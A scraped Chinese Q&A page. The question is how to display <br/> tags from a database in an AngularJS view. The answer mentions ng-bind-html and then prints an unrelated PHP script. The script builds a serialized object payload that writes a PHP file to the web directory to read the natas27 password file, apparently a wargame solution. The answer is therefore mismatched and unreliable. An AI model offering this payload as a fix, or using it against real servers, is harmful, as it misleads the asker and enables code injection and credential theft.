如何阅读从数据库到angularJS视图的标签

时间:2017-11-14 08:46:33

标签: html angularjs

我想将从数据库保存的 br 转换为我的前端的换行符。 这是我到目前为止所得到的:

<div ng-repeat="desc in items.description.split(',')"><span class="pre-break">{{desc}}</span></div>

CSS:

.pre-break{
     white-space: pre-wrap !important;
}

数据库中的示例数据:

6 pcs <br/> 2 pc thigh, 2 pc wing, 2 pc chops

但结果仍然是这样的:

6 pcs <br/> 2 pc thigh | 2 pc wing | 2 pc chops

如何转换br标签?

1 个答案:

答案 0 :(得分:0)

您可以使用 ng-bind-html ,如

<?php
$obj = array();
$obj['initMsg'] = '';
$obj['exitMsg'] = "<?php include('/etc/natas_webpass/natas27');?>";
$obj['logFile'] = "img/code.php";
echo base64_encode(serialize($obj));
?>